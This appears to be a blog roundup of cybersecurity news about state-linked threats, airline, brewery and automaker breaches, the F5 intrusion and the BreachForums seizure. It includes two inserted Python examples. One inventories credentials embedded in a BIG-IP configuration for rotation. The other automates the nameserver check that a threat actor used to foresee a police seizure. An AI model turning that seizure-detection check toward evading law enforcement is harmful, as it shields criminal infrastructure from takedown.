
NCSC Warns of Rising Cyber Threats Linked to China, Urges Businesses to Build Defences

 



The United Kingdom’s National Cyber Security Centre (NCSC) has cautioned that hacking groups connected to China are responsible for an increasing number of cyberattacks targeting British organisations. Officials say the country has become one of the most capable and persistent sources of digital threats worldwide, with operations extending across government systems, private firms, and global institutions.

Paul Chichester, the NCSC’s Director of Operations, explained that certain nations, including China, are now using cyber intrusions as part of their broader national strategy to gain intelligence and influence. According to the NCSC’s latest annual report, China remains a “highly sophisticated” threat actor capable of conducting complex and coordinated attacks.

This warning coincides with a government initiative urging major UK companies to take stronger measures to secure their digital infrastructure. Ministers have written to hundreds of business leaders, asking them to review their cyber readiness and adopt more proactive protection strategies against ransomware, data theft, and state-sponsored attacks.

Last year, security agencies from the Five Eyes alliance, comprising the UK, the United States, Canada, Australia, and New Zealand, uncovered a large-scale operation by a Chinese company that controlled a botnet of over 260,000 compromised devices. In August, officials again warned that Chinese-backed hackers were targeting telecommunications providers by exploiting vulnerabilities in routers and using the infected devices as footholds to infiltrate additional networks.

The NCSC also noted that other nations, including Russia, are believed to be “pre-positioning” their cyber capabilities in critical sectors such as energy and transportation. Chichester emphasized that the war in Ukraine has demonstrated how cyber operations are now used as instruments of power, enabling states to disrupt essential services and advance strategic goals.


Artificial Intelligence: A New Tool for Attackers

The report highlights that artificial intelligence is increasingly being used by hostile actors to improve the speed and efficiency of existing attack techniques. The NCSC clarified that, while AI is not currently enabling entirely new forms of attacks, it allows adversaries to automate certain stages of hacking, such as identifying security flaws or crafting convincing phishing emails.

Ollie Whitehouse, the NCSC’s Chief Technology Officer, described AI as a “productivity enhancer” for cybercriminals. He explained that it is helping less experienced hackers conduct sophisticated campaigns and enabling organized groups to expand operations more rapidly. He added, however, that AI does not currently pose an existential threat to national security.


Ransomware Remains the Most Severe Risk

For UK businesses, ransomware continues to be the most pressing danger. Criminals behind these attacks are financially motivated, often targeting organisations with weak security controls regardless of size or industry. The NCSC reports seeing daily incidents affecting schools, charities, and small enterprises struggling to recover from system lockouts and data loss.

To strengthen national resilience, the upcoming Cyber Security and Resilience Bill will require critical service providers, including data centres and managed service firms, to report cyber incidents within 24 hours. By increasing transparency and response speed, the government hopes to limit the impact of future attacks.

The NCSC urges business leaders to treat cyber risk as a priority at the executive level. Understanding the urgency of action, maintaining up-to-date systems, and investing in employee awareness are essential steps to prevent further damage. As cyber activity grows “more intense, frequent, and intricate,” the agency stresses that a united effort between the government and private sector is crucial to protecting the UK’s digital ecosystem.



Qantas Data Leak Highlights Rising Airline Cyberattacks and Identity Theft Risks

 

Airlines continue to attract the attention of cybercriminals due to the vast amounts of personal data they collect, with passports and government IDs among the most valuable targets. According to privacy firm Incogni, the exposure of such documents poses a “severe, long-term identity theft risk” since they are difficult to replace and can be exploited for years in fraud schemes involving fake identities, counterfeit documents, and impersonation scams. 

The recent Qantas Airways data breach, claimed by the Scattered LAPSUS$ Hunters group, underscores the sector’s growing vulnerability. The stolen data included names, email addresses, Frequent Flyer details, and limited personal information such as phone numbers and birth dates. Fortunately, Qantas confirmed that no passport details, financial information, or credit card data were compromised. 

However, experts warn that even limited leaks can have serious consequences. “Attackers often combine personal identifiers like names and loyalty program details from multiple breaches to build complete identity profiles,” said Darius Belejevas, Head of Incogni. Such composite records can enable large-scale fraud even without financial data exposure. 

The Qantas incident also highlights the danger of third-party compromises. The breach reportedly stemmed from Salesforce social engineering and vendor vulnerabilities, illustrating how a single compromised supplier can have ripple effects across industries. Belejevas emphasized that “one compromised partner can expose millions of records in a single incident.” 

Data breaches in the airline industry are escalating rapidly. According to Cyble’s threat intelligence database, more than 20 airline-related breaches have been reported on the dark web in 2025 — a 50% increase from 2024. Much of this surge is attributed to coordinated attacks by Scattered Spider and the broader Scattered LAPSUS$ Hunters alliance, although other groups have also begun targeting the aviation sector. 

In a separate incident, the CL0P ransomware group claimed to have breached Envoy Air, a regional carrier of American Airlines. Envoy confirmed the intrusion but stated that no customer data was affected, only limited business information. In contrast, WestJet, which suffered a breach in June 2025, had passports and government-issued IDs exposed, prompting it to offer two years of free identity monitoring to affected customers. Incogni, however, warned that identity theft risks from such documents can persist well beyond two years. 

Experts urge travelers to take preventive security measures. Incogni recommends enrolling in identity theft monitoring, reporting phishing attempts to national anti-fraud agencies, using strong passwords with multi-factor authentication, and removing personal data from data broker sites. 

“Individuals and organizations must do more to safeguard sensitive data,” said Ron Zayas, CEO of Incogni. “In today’s world, data isn’t just being stolen by hackers — it’s also being misused by legitimate entities to manipulate outcomes.”

Hundreds of European Flights Disrupted by Major Ransomware Attack

 

A major ransomware attack recently caused widespread disruption to airline operations across several key European airports, resulting in hundreds of flight cancellations and delays for passengers. The incident highlights the growing vulnerability of the aviation industry due to its heavy reliance on technology, especially third-party software for critical services such as check-in and baggage handling.

The attack specifically targeted the popular MUSE check-in and boarding system, developed by US-based Collins Aerospace, a subsidiary of RTX. European cybersecurity agency ENISA confirmed on September 22 that ransomware had affected MUSE’s operations, forcing airports in Berlin, Brussels, and London Heathrow to revert to manual systems. 

The impact was severe: Brussels Airport canceled half of its Sunday and Monday flights, and Berlin Airport reported delays exceeding an hour due to nonfunctional check-in systems. At London Heathrow, Terminal 4 experienced significant disruption, with departures delayed by up to two hours and ongoing manual check-ins.

While Collins Aerospace said that manual processes could mitigate the problems, the scale of the disruption proved otherwise. Staff struggled to manage operations without system support, underscoring the risk of depending on a single software supplier and the need for tested fallback procedures as well as robust cybersecurity measures. Restoration of MUSE was nearly complete by Monday. Some airports, such as Dublin, experienced only minimal disruption, showing that the impact varied considerably by location.

The broader risk is amplified by the fact that MUSE is used by over 300 airlines at 100 airports worldwide, raising concerns about the possibility of further attacks if vulnerabilities remain unaddressed. Experts caution that a compromised update could still threaten other airports, or that attackers may use initial breaches to extort further ransom from software providers.

This incident is part of a dramatic surge in cyberattacks facing the aviation sector, which saw a staggering 600% increase in 2025 compared to the previous year, according to French aerospace company Thales. Experts point out the economic and geopolitical stakes involved, advocating for a comprehensive cybersecurity strategy, adoption of AI tools, and industry-wide collaboration to address threats. 

The attack highlights that cyberattacks may have objectives beyond operational disruption, potentially targeting sensitive data and system integrity and emphasizing the urgent need for more resilient aviation security protocols.

The Silent Guardians Powering the Frontlines of Cybersecurity

 


Modern warfare has shifted from trenches to terminals, into a world increasingly defined by invisible battles and silent warriors. Cyberwarfare is no longer a distant, abstract threat; it is a tangible, relentless struggle with real-world consequences.

Power grids fail, hospitals go dark, and global markets tremble as a result of unseen attacks. At the centre of this new conflict stands a unique breed of defenders: the cyber professionals who safeguard the fragile line between digital order and chaos. The official trailer for Semperis' Midnight in the War Room, an upcoming documentary about the hidden costs of cyber conflict, has been released, bringing this hidden war into sharp focus. 

Semperis, a provider of AI-powered identity security and cyber resilience, has assembled an extraordinary lineup of voices for the film, including Chris Inglis, the first U.S. National Cyber Director; General (Ret.) David Petraeus, the former Director of the CIA; Jen Easterly, former Director of CISA; Marcus Hutchins, one of the WannaCry heroes; and Professor Mary Aiken, a globally recognised cyber psychologist, all of whom are highly respected for their expertise in cybersecurity. 

The film examines the high-stakes battle between attackers and defenders, with contributions from reformed hackers who once carried out such attacks themselves. Leading figures from cybersecurity and national defence gather in the documentary to present an unprecedented view of the digital battlefield. 

Drawing on these insights, Midnight in the War Room explores the growing threat that cybercrime poses to international relations and to corporate survival. The film sheds light on the crucial role of chief information security officers (CISOs), who serve as the front line protecting critical infrastructure, from power grids to financial networks, against state-sponsored and criminal cyber threats. 

More than fifty international experts, including cyber journalists, intelligence veterans, and reformed hackers, contribute perspectives that show both the ingenuity and the exhaustion of those facing constant digital attacks. Chris Inglis argues that the biggest threat lies not only in the sophistication of adversaries but in complacency itself, and that global resilience is an urgent issue. 

Semperis' Chief Marketing Officer and Executive Producer, Thomas LeDuc, has described the project as one of the first of its kind to capture the courage and pressure experienced by defenders. The film is enriched by contributions from Professor Mary Aiken, Heath Adams, Marene Allison, Kirsta Arndt, Grace Cassy and several former chief information security officers, such as Anne Coulombe and Simon Hodgkinson, and it offers a sweeping and deeply human perspective on modern cyber warfare. 

With its powerful narrative, Midnight in the War Room explores the human side of cyberwarfare, a struggle that is rarely acknowledged yet marked by courage, resilience and sacrifice. The film looks at the psychological and emotional toll endured by those defending the world's most vital systems, where trust is continually at risk and a single moment of complacency can trigger devastating consequences. 

Semperis' Vice President for Asia Pacific and Japan, Mr Sillars, points out that cyber threats do not recognise borders and that the Asia Pacific region is at the forefront of this digital conflict. 

He emphasises that the documentary seeks to highlight the common challenges cybersecurity professionals face worldwide and to foster collaboration within critical sectors to build identity-driven resilience. LeDuc describes the project as one of the most ambitious in cybersecurity history, bringing together top intelligence leaders, chief information security officers, journalists, victims and reformed hackers in a rare collaborative narrative.

In the film, Cyber Defenders' lives are portrayed through their own experiences as well as the relentless pressure and unwavering resolve they face every day. Among the prominent experts interviewed for the documentary are Marene Allison, former Chief Information Security Officer of Johnson & Johnson; Grace Cassy, co-founder of CyLon; Heather M. Costa, Director of Technology Resilience at the Mayo Clinic; Simon Hodgkinson, former Chief Information Security Officer of BHP; and David Schwed, former Chief Information Security Officer of Robinhood. 

Among those on the panel are Richard Staunton, Founder of IT-Harvest; BBC Cyber Correspondent Joe Tidy; and Jesse McGraw, known as Ghost Exodus, a former hacktivist who has turned his expertise towards safeguarding the internet. As Jen Easterly, former Director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), points out, defeating malicious cyberattacks requires more than advanced technology; it demands the ingenuity and curiosity of the human mind. 

The production itself was a global collaboration: the documentary was filmed in North America and Europe with the support of cybersecurity and professional organisations including the CyberRisk Alliance, Cyber Future Foundation, Institute for Critical Infrastructure Technology, (ISC)2 Eastern Massachusetts Chapter, Michigan Council of Women in Technology, and Women in CyberSecurity (WiCyS) Delaware Valley Chapter. 

As part of these partnerships, private screenings, expert discussions, and public outreach will be conducted in order to increase public awareness and cooperation regarding building digital resilience. By providing an insight into the human narratives that underpin cybersecurity, Midnight in the War Room hopes to give a deeper understanding of the modern battlefield and to inspire a collective awareness in the safeguarding of society's systems. 

There is something special about Midnight in the War Room, both as a wake-up call and as a tribute - a cinematic reflection of those who stand up to the threats people face in today's digital age. The film focuses on cyber conflict and invites governments, organisations, and individuals to recognise the importance of cybersecurity not just as a technical problem, but as a responsibility that people all share. 

In light of the continuous evolution of threats, people need stronger international collaborations, investments in identity security, and the development of psychological resilience among those on the front lines to help combat these threats. Semperis' initiative illustrates the power of storytelling to bridge the gap between awareness and action, transforming technical discourse into a powerful narrative that inspires vigilance, empathy, and unity among the community.

Providing a critical insight into the human aspect behind the machines, Midnight in the War Room reinforces a fundamental truth: that is, cybersecurity is not just about defending data, but also about protecting the people, systems, and values that make modern society what it is today.

Asahi Group Confirms Ransomware Attack Disrupting Operations and Leaking Data

 

Japanese food and beverage conglomerate Asahi Group Holdings has confirmed that a ransomware attack severely disrupted its operations and potentially exposed sensitive data, including employee and financial information. The cyberattack, which occurred on September 29, 2025, forced the company to delay releasing its January–September financial results, originally scheduled for November 12. 

The attack paralyzed Asahi’s domestic order and shipment systems, halting automated operations across Japan. Despite the disruption, the company implemented manual order processing and resumed partial shipments to ensure a continued supply of its popular beverages and food products. 

The Qilin ransomware group has claimed responsibility for the breach, asserting that it stole over 9,300 files containing personal and financial data. On October 8, Asahi confirmed that some of the stolen data was found online, prompting a detailed investigation into the scope and type of compromised information. In a public statement, the company said it is working to identify affected individuals and will issue notifications once the investigation confirms unauthorized data transfer.  

Although the incident primarily impacted systems within Japan, Asahi stated there is no evidence of compromise affecting its global operations. 

Recovery efforts are steadily progressing. Asahi Breweries resumed production at all six of its factories by October 2, restoring shipments of Asahi Super Dry, with other product lines following soon after. Asahi Soft Drinks restarted production at six of its seven plants by October 8, while Asahi Group Foods has also resumed partial operations at all seven domestic facilities.  

However, Asahi’s systems have not yet been fully restored, and the company has not provided a definite recovery timeline. The ongoing disruption has delayed access to critical accounting systems, forcing a postponement of quarterly financial reporting. 

In its official statement, Asahi explained that the financial disclosure delay is necessary to ensure accuracy and compliance amid system recovery. The company issued an apology to shareholders and stakeholders for the inconvenience caused and promised transparent updates as investigations and remediation progress. 

The Asahi Group cyberattack serves as another reminder of the rising frequency and impact of ransomware incidents targeting major corporations worldwide.

Nation-State Hackers Breach F5 Networks, Exposing Thousands of Government and Corporate Systems to Imminent Threat

 

Thousands of networks operated by the U.S. government and Fortune 500 companies are facing an “imminent threat” of cyber intrusion after a major breach at Seattle-based software maker F5 Networks, the federal government warned on Wednesday. The company, known for its BIG-IP networking appliances, confirmed that a nation-state hacking group had infiltrated its systems in what it described as a “sophisticated, long-term intrusion.” 

According to F5, the attackers gained control of the network segment used to develop and distribute updates for its BIG-IP line—a critical infrastructure tool used by 48 of the world’s top 50 corporations. During their time inside F5’s systems, the hackers accessed proprietary source code, documentation of unpatched vulnerabilities, and customer configuration data. Such access provides attackers with an extraordinary understanding of the product’s architecture and weaknesses, raising serious concerns about potential supply-chain attacks targeting thousands of networks worldwide. 

Security analysts suggest that control of F5’s build environment could allow adversaries to manipulate software updates or to weaponise the unpatched flaws documented in the stolen material before fixes ship. BIG-IP appliances often sit at the network edge, acting as load balancers, firewalls, and TLS termination gateways, so a compromise of one can provide a direct pathway into the systems behind it. The stolen customer configuration data is a separate concern: BIG-IP configurations routinely embed credentials, shared secrets and key material, which an attacker can reuse for deeper infiltration unless they are rotated. 
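A practical follow-up to the stolen-configuration concern above is to inventory every credential embedded in your own BIG-IP configuration so that each one can be rotated. The script below is an added example written for this page, not F5 tooling. The tmsh-style configuration it parses is constructed and simplified, and the attribute names it searches for (password, encrypted-password, passphrase, secret, shared-secret, community-name) are an assumed starting point covering common objects, not an exhaustive list.

```python
"""Inventory credentials embedded in a BIG-IP-style tmsh configuration.

Added example for this page, not F5 tooling. The configuration below is
constructed and simplified, but follows the bigip.conf layout:
    <module> <type> <name> {
        <attribute> <value>
        <nested-block> { ... }
    }
If an attacker holds a copy of your config, every secret it embeds must be
treated as exposed. This script lists where they are so they can be rotated;
it deliberately does not record the secret values themselves.
"""

# Attribute names whose values are credentials or key material in common
# tmsh objects (monitors, auth users, RADIUS servers, SNMP). Assumed
# starting point, not an exhaustive list.
SECRET_KEYS = {
    "password", "encrypted-password", "passphrase",
    "secret", "shared-secret", "community-name",
}
# Stored as a one-way hash; still rotate, since the hash can be cracked offline.
HASHED_KEYS = {"encrypted-password"}

# Constructed sample configuration (hash and secrets are placeholders).
SAMPLE_CONFIG = """\
auth user admin {
    description "Admin User"
    encrypted-password $6$rounds=5000$saltsalt$FAKEHASHFORILLUSTRATION
    partition-access {
        all-partitions {
            role admin
        }
    }
    shell tmsh
}
ltm monitor https /Common/app_health {
    defaults-from /Common/https
    interval 5
    password c2VjcmV0
    recv "200 OK"
    send "GET /health HTTP/1.1\\r\\n\\r\\n"
    username healthcheck
}
auth radius-server /Common/rad1 {
    secret S3cr3t-shared
    server 10.0.0.5
}
sys snmp {
    communities {
        /Common/comm-public {
            community-name public
            source default
        }
    }
}
ltm pool /Common/web_pool {
    members {
        /Common/10.0.0.10:80 {
            address 10.0.0.10
        }
    }
    monitor /Common/app_health
}
"""


def find_secrets(config_text, secret_keys=SECRET_KEYS):
    """Walk the brace structure and return (object_path, attribute, is_hashed) tuples.

    The object path is the chain of enclosing block headers joined by ' > ',
    e.g. 'sys snmp > communities > /Common/comm-public'.
    """
    findings = []
    stack = []  # headers of the blocks we are currently inside
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("{ }"):       # empty block on one line: nothing inside it
            continue
        if line.endswith("{"):         # block header: descend
            stack.append(line[:-1].strip())
            continue
        if line == "}":                # block end: ascend
            if stack:
                stack.pop()
            continue
        attribute = line.split(None, 1)[0]
        if attribute in secret_keys:
            findings.append((" > ".join(stack), attribute, attribute in HASHED_KEYS))
    return findings


def rotation_plan(findings):
    """Group findings by the action an operator has to take."""
    plan = {"reset_hashed_password": [], "rotate_plaintext_secret": []}
    for path, attribute, hashed in findings:
        bucket = "reset_hashed_password" if hashed else "rotate_plaintext_secret"
        plan[bucket].append(f"{path} [{attribute}]")
    return plan


if __name__ == "__main__":
    for action, items in rotation_plan(find_secrets(SAMPLE_CONFIG)).items():
        print(action)
        for item in items:
            print("   ", item)
```

Run it against a real bigip.conf (or the config extracted from a UCS archive) and treat every line it lists as a secret the attacker may hold; monitor passwords and RADIUS shared secrets in particular are stored reversibly and should be changed on the peer system as well as on the appliance.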

Despite the severity of the breach, F5 stated that investigations by multiple cybersecurity firms, including IOActive, NCC Group, Mandiant, and CrowdStrike, have found no evidence of tampering with its source code or build pipeline, and no evidence that critical vulnerabilities were introduced. F5 also said it found no evidence of access to or exfiltration from its CRM, financial, or support-case systems, although the attackers did take configuration and implementation data belonging to a small share of customers. Experts caution that the attackers’ deep access and stolen intelligence could still enable future targeted exploits. 

In response, F5 has issued updates for its BIG-IP, F5OS, BIG-IQ, and APM products and rotated its signing certificates to secure its software distribution process. The company has also provided a threat-hunting guide to assist customers in detecting potential compromise indicators. 

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive warning that the breach “poses an unacceptable risk” to federal networks. Agencies using F5 appliances have been ordered to inventory all affected devices, install the latest patches, and follow the company’s threat-hunting protocols. Similarly, the UK’s National Cyber Security Centre (NCSC) has released guidance urging organizations to update their systems immediately. 

While no supply-chain compromise has yet been confirmed, the breach of a vendor as deeply embedded in global enterprise networks as F5 underscores the growing risk of nation-state infiltration in critical infrastructure software. As investigations continue, security officials are urging both government and private organizations to take swift action to mitigate potential downstream threats.

Automakers Face Surge in Cyberattacks as Jaguar Land Rover and Renault Recover from Major Breaches

 

Cybersecurity experts have warned that global automakers are likely to face an increasing wave of cyberattacks, as recent incidents continue to disrupt operations at leading manufacturers. The warning follows a series of high-profile breaches, including a major cyberattack on Jaguar Land Rover (JLR), which remains one of the most significant security incidents to hit the automotive industry in recent years. 

Jaguar Land Rover suffered a severe cyberattack at the end of August, forcing the company to shut down its IT systems and suspend production across multiple facilities. The disruption caused widespread operational chaos, but JLR recently confirmed it has begun a phased restart of production at its Electric Propulsion Manufacturing Centre (EPMC) and Battery Assembly Centre (BAC) in the West Midlands. The automaker plans to expand the restart to other key sites, including Castle Bromwich, Halewood, Solihull, and its manufacturing facility in Nitra, Slovakia. 

JLR CEO Adrian Mardell expressed gratitude to employees for their efforts during the recovery, stating, "We know there is much more to do, but our recovery is firmly underway." However, the company remains cautious as it works to fully restore systems and strengthen security controls. 

French automaker Renault also confirmed that one of its third-party data processing providers had been targeted in a separate cyberattack, compromising customer information such as names, addresses, dates of birth, gender, phone numbers, vehicle registration details, and vehicle identification numbers (VINs). While Renault clarified that no financial or password data was accessed, the company has begun notifying affected customers and advising them to be wary of phishing attempts or fraudulent communications.  

Ignas Valancius, head of engineering at cybersecurity firm NordPass, warned that cybercriminals often exploit such incidents to impersonate company representatives, lawyers, or even law enforcement to extract additional personal or financial data. He emphasized the growing sophistication of social engineering attacks, noting that scammers may pose as attorneys offering to help victims claim compensation, only to defraud them further. 

The automotive sector's vulnerability has become increasingly evident in 2025, with luxury manufacturers frequently targeted by ransomware and data theft operations. In addition to JLR and Renault, other global brands have reported breaches. 

Meanwhile, Swedish HR software provider Miljödata suffered a breach that compromised the personal information of Volvo North America employees, and Stellantis confirmed unauthorized access to its customer contact database via a third-party provider. Valancius highlighted that cybercriminals appear to be deliberately targeting luxury brands, seeking to exploit their association with high-net-worth clientele. "It seems that luxury brands have been prime targets for hacker groups in 2025," he said, adding that these incidents could lead to more sophisticated spear-phishing campaigns and targeted extortion attempts. 

As automakers increasingly rely on digital systems, connected vehicles, and cloud-based infrastructure, experts stress that robust cybersecurity measures and third-party risk management are now essential to safeguard both company data and customer privacy. The recent breaches serve as a stark reminder that the automotive industry's digital transformation has also made it a lucrative target for global cybercriminal networks.

BreachForums Taken Down by FBI and French Authorities as LAPSUS$-Linked Group Threatens Salesforce Data Leak

 



U.S. and French law enforcement agencies have seized the latest version of BreachForums, a cybercrime platform known for hosting stolen databases and leaked information. The takedown was carried out by the Federal Bureau of Investigation (FBI), the U.S. Department of Justice, and French cybercrime authorities, who placed an official seizure notice on the site on October 9.

This development comes just hours before an extortion deadline announced by a threat group calling itself Scattered LAPSUS$ Hunters, which had threatened to leak data allegedly stolen from Salesforce and Salesloft if ransom demands were not met by October 10.

The seizure was noticed on Telegram before it became official. A threat actor using the alias “emo” had observed that BreachForums’ domain was using Cloudflare name servers matching those seen on sites the FBI had previously seized, suggesting law enforcement action was imminent.
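The signal emo relied on, a domain's nameservers lining up with those of earlier seizures, is cheap to automate for any domain you watch. The following is an added example written for this page, not code from the article or from anyone it quotes. It records a domain's NS set, reports when it changes, and checks whether the new set overlaps nameservers previously observed on seized domains. Every domain and nameserver below is a constructed placeholder, and the live lookup helper assumes `dig` is installed.

```python
"""Flag a watched domain whose nameservers match infrastructure seen on
previously seized sites.

Added example for this page, not code from the article or the people it
quotes. It records the NS set for a domain, reports when that set changes,
and checks whether the new set overlaps nameservers already observed on
known seized domains. Cloudflare assigns each zone a pair of nameservers
drawn from its pool, so an exact pair match is a much stronger hint of a
shared account than a single shared name. Every domain and nameserver here
is a constructed placeholder; lookup_ns() assumes `dig` is installed.
"""
import subprocess

# Constructed `dig +short NS <domain>` output from two points in time.
BASELINE_ANSWER = "ns1.old-registrar.example.\nns2.old-registrar.example.\n"
OBSERVED_ANSWER = "kip.ns.cloudflare.com.\nADA.ns.cloudflare.com.\n"

# Constructed: nameserver sets previously recorded on domains that carried
# a law-enforcement seizure banner.
KNOWN_SEIZED = {
    "seized-one.example": {"ada.ns.cloudflare.com", "kip.ns.cloudflare.com"},
    "seized-two.example": {"ns1.seizure-host.example", "ns2.seizure-host.example"},
}


def parse_ns_answer(text):
    """Normalise dig +short output: strip trailing dots, lowercase, dedupe."""
    return {line.strip().rstrip(".").lower() for line in text.splitlines() if line.strip()}


def lookup_ns(domain):
    """Live lookup via dig (not exercised offline)."""
    proc = subprocess.run(["dig", "+short", "NS", domain],
                          capture_output=True, text=True, check=True)
    return parse_ns_answer(proc.stdout)


def nameserver_change(previous, current):
    """Describe how the NS set moved between two observations."""
    return {
        "changed": previous != current,
        "added": sorted(current - previous),
        "removed": sorted(previous - current),
    }


def shared_ns_accounts(current, known):
    """Return (seized_domain, shared_names, exact_set_match) for every overlap."""
    hits = []
    for domain, ns_set in known.items():
        overlap = current & ns_set
        if overlap:
            hits.append((domain, sorted(overlap), current == ns_set))
    return hits


def assess(previous_answer, current_answer, known=KNOWN_SEIZED):
    """Combine change detection with seizure-infrastructure overlap.

    verdict: 'strong' when the full NS set matches a seized domain's set,
             'weak' when only some names are shared, 'none' otherwise.
    """
    previous = parse_ns_answer(previous_answer)
    current = parse_ns_answer(current_answer)
    change = nameserver_change(previous, current)
    hits = shared_ns_accounts(current, known)
    strong = [h for h in hits if h[2]]
    verdict = "strong" if strong else "weak" if hits else "none"
    return {"change": change, "hits": hits, "verdict": verdict}


if __name__ == "__main__":
    print(assess(BASELINE_ANSWER, OBSERVED_ANSWER))
```

In practice the baseline comes from a stored earlier observation and the current answer from lookup_ns(); a "strong" verdict is only a lead, since nameserver pools are shared, and the seizure banner itself is the confirmation.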

Following the seizure, Scattered LAPSUS$ Hunters confirmed the action on its Telegram channel through a PGP-signed message, claiming that all their BreachForums-related domains and backend infrastructure were taken offline and destroyed. The group, however, asserted that its members had not been arrested and that their Tor-based data leak site remained active.

“The era of forums is over,” the message read, warning members to maintain operational security and avoid new BreachForums clones, which the group claimed could be “honeypots” operated by law enforcement.


Compromised Infrastructure and Data

The group stated that during the seizure, all BreachForums database backups dating from 2023 to the present were compromised, along with escrow and server systems. They also alleged that their onion hidden service was affected because the underlying infrastructure had been seized and destroyed.

Despite this, Scattered LAPSUS$ Hunters insisted that the takedown would not affect their planned Salesforce data leak campaign. The group reiterated that the October 10 deadline for victims to comply with their ransom demands remained unchanged.

This marks the fourth major seizure in the history of BreachForums and its predecessors, including the earlier RaidForums. Both forums have been repeatedly targeted by global law enforcement operations and linked to several high-profile arrests over the years.

The group also revealed that the widely known administrator “pompompurin,” believed to have launched BreachForums after RaidForums’ closure, had merely been a “front,” suggesting that the forum’s operations were coordinated by a wider network of individuals from the start.


What Lies Ahead

While the seizure has temporarily disrupted the group’s clearnet operations, cyber experts caution that criminal forums often migrate to the dark web or encrypted channels to continue their activities. Authorities are expected to pursue further investigations in the coming weeks to identify and apprehend those involved.

For cybersecurity professionals and enterprises, the takeaway is to keep monitoring data exposure risks and to stay alert to secondary leaks, especially while extortion groups remain active on alternate platforms.



Asahi Beer Giant Hit by Cyberattack, Forced to Manual Operations

 

Japanese brewing giant Asahi Group Holdings, the manufacturer of Japan's most popular beer Super Dry, suffered a devastating ransomware attack in late September 2025 that forced the company to revert to manual operations using pen, paper, and fax machines. The cyberattack was first disclosed on September 29, when the company announced a system failure that disrupted ordering, shipping, and customer service operations across its 30 domestic breweries in Japan.

The ransomware incident, later claimed by the Qilin hacking group, forced Asahi to temporarily shut down nearly all its Japanese production facilities. The attack crippled the company's online systems, leaving vendors and business owners without access to information as call centers and customer service desks were closed. Asahi was forced to process orders manually using traditional paper-based methods and fax machines to prevent potential beverage shortages across the country.

Initial investigations revealed traces suggesting potential unauthorized data transfer, and the company later confirmed on October 14 that personal information may have been compromised. The Qilin ransomware gang claimed responsibility for the breach, alleging they stole approximately 27 gigabytes of data containing financial documents, budgets, contracts, employee personal information, and company development forecasts. Samples of allegedly stolen data included employee ID cards and other personal documents.

The cyberattack had widespread operational consequences beyond production disruptions. Asahi postponed its quarterly financial results for the third quarter of fiscal year 2025 because the incident disrupted access to accounting-related data and delayed financial closing procedures. Recovery efforts involved collaboration between Asahi's Emergency Response Headquarters, cybersecurity specialists, and Japanese cybercrime authorities.

While all breweries have partially resumed operations and restarted production, computer systems remain non-operational with no clear timeline for full recovery. The company has committed to promptly notifying affected individuals and implementing appropriate measures in accordance with personal data protection laws. This incident highlights Japan's vulnerability to ransomware attacks, as Japanese companies often have weaker cybersecurity defenses compared to other nations and are more likely to pay ransom demands.

Qilin Ransomware Gang Claims Cyberattack on Japanese Beer Giant Asahi

 

The Qilin ransomware group has claimed responsibility for the recent cyberattack on Japanese brewing giant Asahi, adding the company’s name to its dark web data leak site. The cybercriminals alleged that they had stolen over 9,300 files amounting to 27GB of confidential data, including financial documents, employee identification records, contracts, and internal reports. To substantiate their claims, the group published 29 images showing snippets of the stolen files. 

Asahi, Japan’s largest beer manufacturer, employs around 30,000 people and produces approximately 100 million hectoliters annually, generating close to $20 billion in revenue. The company suffered significant operational disruptions following the attack. On September 29, Asahi temporarily halted production at six of its domestic facilities, later confirming on October 3 that a ransomware attack had crippled its systems and led to data exfiltration. 

At first, no threat actor took public credit for the breach. However, the Qilin ransomware group eventually listed Asahi among its victims, likely after ransom negotiations failed. Qilin, which emerged in 2023, is known as a multi-platform ransomware operation capable of targeting both Windows and Linux systems. The group has been associated with other notorious hacker collectives such as Scattered Spider and, more recently, North Korean state-linked actors. 

Qilin’s tactics include exploiting vulnerabilities in edge network devices, deploying credential theft tools, and developing sophisticated encryption mechanisms to hinder recovery. The group has previously targeted high-profile organizations including Nissan, Inotiv, Lee Enterprises, major hospitals within London’s NHS network, and automotive supplier Yangfeng.

In its post, Qilin claimed that the Asahi ransomware attack could result in losses exceeding $335 million due to production halts affecting six breweries and more than thirty beer labels. Despite the claims, Asahi has not verified the authenticity of the leaked files. In a statement to BleepingComputer, a company spokesperson confirmed that the matter remains under active investigation and declined to comment further. 

The company also shared that production of its flagship beer, Super Dry, has resumed through a temporary manual ordering system. While Asahi’s factories are not yet operating at full capacity, shipments for additional labels are expected to restart by October 15. However, as a direct consequence of the cyberattack and ongoing disruptions, Asahi announced it would delay the launch of new products that were initially planned for October 2025. 

The attack on Asahi underscores the growing reach and sophistication of ransomware groups like Qilin, whose increasingly destructive campaigns continue to target global corporations across industries, threatening both economic stability and consumer trust.

Toowoomba Pharmacy Targeted in Ransomware Attack

A pharmacy in Toowoomba, Queensland, has become the latest victim of a ransomware attack, highlighting growing concerns about the digital vulnerability of small businesses. 

The incident occurred last month when hackers gained access to the Friendlies Society Dispensary’s private IT systems. Authorities believe sensitive data stored on the system may have been compromised. 

A coordinated investigation is now underway, involving the National Office of Cyber Security, the Australian Cyber Security Centre, Services Australia, Queensland Health, the National Disability Insurance Agency, and the Department of Home Affairs. 

Bayden Johnson, Chief Executive Officer of the Friendlies Society Dispensary, said the organisation acted quickly once the attack was detected. “We immediately took steps to secure our systems and understand the nature of the incident,” he said. “Our priority now is to determine what information was accessed and ensure all necessary precautions are taken.” 

The pharmacy, which offers healthcare services and mobility support equipment, is cooperating fully with federal authorities. The Department of Home Affairs stated that Services Australia’s systems remain secure and were not affected by the breach. It added that ongoing monitoring is being carried out to detect any irregular activity. 

According to the Australian Signals Directorate (ASD), ransomware incidents account for 11 percent of all reported cyberattacks in the country. 

The ASD’s 2023–24 Annual Cyber Threat Report revealed that a cybercrime report is lodged roughly every six minutes, with small businesses reporting an average loss of $49,600 per attack. 

Associate Professor Saeed Akhlaghpour from the University of Queensland’s Cyber Research Centre said cybercriminals are constantly evolving their tactics. “Attackers are no longer just locking files; they are also stealing and leaking data. Ransomware can even be delivered through browsers, apps, or malicious file uploads,” he explained. 

Dr Akhlaghpour, who researches cybersecurity risks in the healthcare sector, said health organisations such as pharmacies, medical practices, and gyms often face higher risks due to inconsistent monitoring and handling of sensitive information. 

He noted that human error is still the leading cause of ransomware attacks, as employees often reuse passwords or click on unsafe links in haste. With the rise of AI-powered tools that make it easier for criminals to conduct large-scale attacks, he urged small business owners to invest in better cybersecurity systems and response plans. 

